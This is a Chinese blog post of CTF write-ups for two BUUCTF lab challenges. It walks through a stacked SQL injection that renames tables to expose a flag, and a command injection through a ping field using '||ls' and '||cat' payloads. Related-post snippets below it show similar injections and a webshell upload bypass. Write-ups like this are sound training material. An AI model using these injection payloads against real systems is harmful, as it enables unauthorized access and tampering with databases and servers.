[强网杯 2019]随便注 & BUUCTF[ACTF2020 新生赛]Exec

最新推荐文章于 2023-03-27 08:55:19 发布
最新推荐文章于 2023-03-27 08:55:19 发布
阅读量192 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Anton__1/article/details/116236015
版权

[强网杯 2019]随便注

打开靶机后只有一个输入框,是一道注入题

chrome_SCG0fo8cV7.png

1' or 1=1;#

#是用来注释掉后面得sql语句

再输入:

1' order by 2;#   
1' order by 3;#

输入到3 时报错了,证明只有两列:

输入

1'; show tables;#

可以看到有 1919810931114514 和 words 两个表

进入看看有什么

输入

0'; show columns from `words`;#
0'; show columns from `1919810931114514`;#

可以看到words表里有两个属性,即两列:id 和data

而1919810931114514表里只有一个属性列

说明输入框可能查询的就是words表

后台sql语句可能为:

select id,data from words where id=

接下来就是如何获取flag了

思路是把1919810931114514表改名为words表,把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来

在这之前当然要先把words表改名为其他

构造payload:

1';rename table words to word22;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);# 

最后用1' or 1=1;#
求出flag

部分引用https://blog.csdn.net/weixin_45642610/article/details/112337143

BUUCTF[ACTF2020 新生赛]Exec

打开发现网站有一个ping功能

盲猜有命令执行漏洞

1、|(就是按位或),直接执行|后面的语句

2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句

3、&(就是按位与),&前面和后面命令都要执行,无论前面真假

4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令

5、;(linux下有的,和&一样的作用

测试了一下可以payload:

127.0.0.1||ls ../../../../

查看到根目录有flag文件

构造新的payload:

127.0.0.1||cat ../../../../flag

得到flag:

flag{e3d356d3-f575-4c97-86be-f296039c23ec}

H3h3QAQ
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF[强网杯2019]随便
楼阁de猫的博客
09-23 521
[强网杯2019]随便 知识点:堆叠入 首先先输入一个1’,发现报错,再输入1’#,有回显,再输入1’ order by 2#,1’order by 3#,当输入3的时候发现无回显,说明入点是2,但是当我们输入1’ union select 1,2#时,发现过滤了很多关键字,这时我们就要考虑堆叠入 我们输入1’; 发现下面出现了一条横线 那应该是堆叠入了,(什么是堆叠入呢:在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两
BUUCTF[ACTF2020 新生]Exec
楼阁de猫的博客
12-20 638
[ACTF2020 新生]Exec 直接ping127.0.0.1 127.0.0.1;ls 127.0.0.1;cat index.php 发现什么都没有过滤 没找到flag类似的文件,列出根目录下的文件 127.0.0.1;ls / 看到flag文件 127.0.0.1;cat /flag 得到flag
buuctf [ACTF2020 新生]Exec
qq_1873822的博客
03-05 184
又是一道命令执行的题 ping一下127.0.0.1 然后尝试直接cat flag 1.|(就是按位或),直接执行|后面的语句 127.0.0.1 | cat /flag 2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 a || cat /flag 3、&(就是按位与),&前面和后面命令都要执行,无论前面真假 127.0.0.1 & cat /flag 4、 ;(linux下有的,和&一样的作用) 127.0.0.1;cat /f
[强网杯 2019]随便 1
tomatoff的博客
03-14 2841
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
[强网杯 2019]随便
m0_62092622的博客
02-11 1077
打开靶机后先输入引号,报错说明存在SQL入 再输入万能密码1' or 1=1#,返回了表内所有数据,不过不像上一题给出了flag,总不能每道题都那么水吧 输入1' union select 1,2,3#,发现网页过滤了select等一系列关键词,且无法通过大小写绕过 试一下堆叠入(堆叠入原理:在sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句) 输入1'; show t
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 981
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
BUUCTF——[强网杯 2019]随便 1
小白一枚多多关注的博客
03-17 395
这道题是强网杯的题,如果各位之前做过攻防世界有可能就知道强网杯代表着什么,代表着题很难,鹅鹅鹅,好了我们开始进入环境 进入环境后只看见了一段文字和一个文本以及提交按钮,当然在这里我们还不能猜测出是用什么方式进行攻击,老规矩查看一下源代码看看有没有什么有价值的信息 可以看见源代码中说了一句sqlmap是没有灵魂的,那么就此可以判断出这道题应该是sql入并且sqlmap是做不出来的,所以必须得是手工入,那么手工入就需要判断入点在哪里,接下来就是图文解释了,太长了难的打字了 因为禁用了s
BUUCTF-Web-[ACTF2020新生]Upload
m0_61851859的博客
03-27 415
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
BUUCTF-Web- [ACTF2020 新生]Upload
weixin_67813445的博客
03-14 169
本题考察文件上传前端校验以及.phtml的用法
buuctf——[ACTF新生2020]rome && buuctf——[GUET-CTF2019]re && buuctf——[FlareOn4]login
Dicked的博客
12-03 382
[ACTF新生2020]rome 加密运算 很像凯撒密码 第二个for循环进行了校验,把输入的值和v15-v30的初始值进行对比。 程序很简单,就是让我们输入一个字符串,然后判断大小写,进行相应的运算,最后得到了程序开头的数组 v15= [ ‘Q’,‘s’,‘w’,‘3’,‘s’,‘j’, ‘’,‘l’,‘z’,‘4’,’’,‘U’,‘j’,‘w’,’@’,‘l’ ] 由于加密运算里的那个%运算的逆运算很神奇,所以我就采取了最简单值观的暴力破解。 v15= [ 'Q','s','w','3','s'
BUUCTF-Web:[ACTF2020 新生]Upload
m0_56161093的博客
05-30 1120
题目 解题过程 1、上传文件 从网页上来看,可以上传文件,我们尝试上传一个PHP一句话木马。结果如下: 提示我们只能上传图片类型的文件,尝试用burpsuite抓包,发现同样有弹窗,但没有抓到数据。所以这里猜测这里是前端JS进行校验的 2、绕过前端校验 方法一 禁用一下 js 再提交,就可以绕过了 方法二 修改PHP后缀为图片的后缀然后上传,再重新抓包修改后缀 修改前: 修改后: 上传结果如下: 可以看到上传失败,应该是服务器端对上传的文件进行了校验。 3、绕过上传黑名单 常规PHP文件后缀
buuctf——[V&N2020 公开]strangeCpp && buuctf——[BJDCTF2020]easy && buuctf——[ACTF新生2020]usualCrypt
Dicked的博客
12-06 296
[V&N2020 公开]strangeCpp 交叉引用,看伪c,应该是mian函数 24-31输出了字符串 welcome,应该就是这里了。。多了byte_140021008 就这个函数,看到putchar函数里面有刚刚看见的字符串,有flag那味儿了。 从尾开始搞,打印的肯定是flag了,就是dword_140021190这一段和刚刚找到的字符串逐个异或,然后就是找dword_140021190这一段是啥了 这里应该是对dword_140021190进行了操作的,进去看看sub_1
web-[强网杯 2019]随便
wojiushilsy的博客
04-05 238
知识点:SQL入-堆叠入,sql预处理语句,巧用contact()函数绕过 堆叠入原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在分号(;)结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all...
BUUCTF [强网杯 2019]随便1(另一种方法)
weixin_53955759的博客
06-21 378
打开环境,先判断一下是单引号还是双引号闭合
强网杯 2019]随便 【SQL入】四种解法
weixin_38832257的博客
08-17 1519
题目简介 题目名称:[强网杯 2019]随便 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL入 解题步骤 方法一: 首先启动并访问靶机,有一个输入随便输入1' or 1 = 1,测试一下是否存在sql入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
[GXYCTF2019]BabySQli
04-22 1118
题目打开只有一个登录,先用万能密码试一下,:1'or 1=1--+ 密码不对,但是看源代码发现有一串奇怪的字符串。 <!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5--> 怀疑密码和这一串有关系,对其进行base32解码,发现时一个base64加密的内容,解码 发现只select了username, 这样发现检..
CTF 刷题记录(一) 白云新闻搜索(手动与自动化SQL入)
qq_29566629的博客
07-27 6486
题目 给出的靶机如下: 解题思路 首先判断这是考察哪个知识点,只有一个输入,题目中又说到入侵,首先考虑sql入,下面介绍手工和自动化入两种方式 (1)手工入 先随便输入几个值,发现只有在值等于“内容”时有返回结果,其他关键字均没有结果,但是会有会先如下: 用“ ’ ”来探测是否能接受特殊字符以及是否存在入点,结果如图: 很显然,存在前台的js代码在控制输入的字符,找到这个网页的js代码,如下: 代码把所有的特殊字符都换成了空字符。 现在要做的就是就是先把这个网站的js代码停用,如下图:
[WUSTCTF2020]颜值成绩查询 布尔盲
qq_37301470的博客
12-02 276
[WUSTCTF2020]颜值成绩查询 只有一个输入,是sql入题目 尝试输入1,2,3 可以发现是get方法提交的参数且是数字型 故用hackbar /?stunum=1 or 1=2 %23 student number not exists. 刚刚还可以查到现在查不到了判断存在过滤 尝试下发现是空格 上盲脚本 import string import requests select=f"select/**/value/**/from/**/flag" ans="" for i in ran
[ACTF2020 新生]Exec 1
最新发布
09-19
关于 [ACTF2020 新生]Exec 1 的题目中的命令入问题,根据引用的内容来分析,可以使用命令入来解题。在这道题目中,使用命令入的方式进行解题,首先通过测试命令 "ping 127.0.0.1" 来验证是否可以执行命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值